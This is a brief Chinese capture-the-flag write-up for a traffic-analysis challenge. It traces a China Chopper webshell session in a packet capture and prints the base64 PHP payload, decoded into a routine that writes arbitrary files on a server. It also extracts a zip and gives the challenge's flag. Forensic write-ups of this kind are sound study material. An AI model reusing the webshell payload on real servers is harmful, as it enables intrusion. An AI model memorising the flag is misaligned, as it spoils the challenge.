流量分析,文件分离,WebShellTags:流量分析,文件分离,WebShell
0x00. 题目
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:202003_攻防世界_功夫再高也怕菜刀.zip
0x01. WP
1. 分析流量请求,找到一图片上传请求
(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==
Base64_decoded=>@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();&z1=RDpcd2FtcDY0XHd3d1x1cGxvYWRcNjY2Ni5qcGc=
Base64_decoded=>D:\wamp64\www\upload\6666.jpg&z2=FFD8FFE000104A46494600010101007800780000FFDB004300... ...
即将z2内容写入到文件z1中,复制十六进制字符串另存后得到hint信息
2. 导出下载的压缩包
继续查看流量,发现一包含flag.txt的压缩包数据
导出十六进制转存后得到压缩包文件,使用hint信息解压后获得flag
flag为flag{3OpWdJ-JP6FzK-koCMAK-VkfWBq-75Un2z}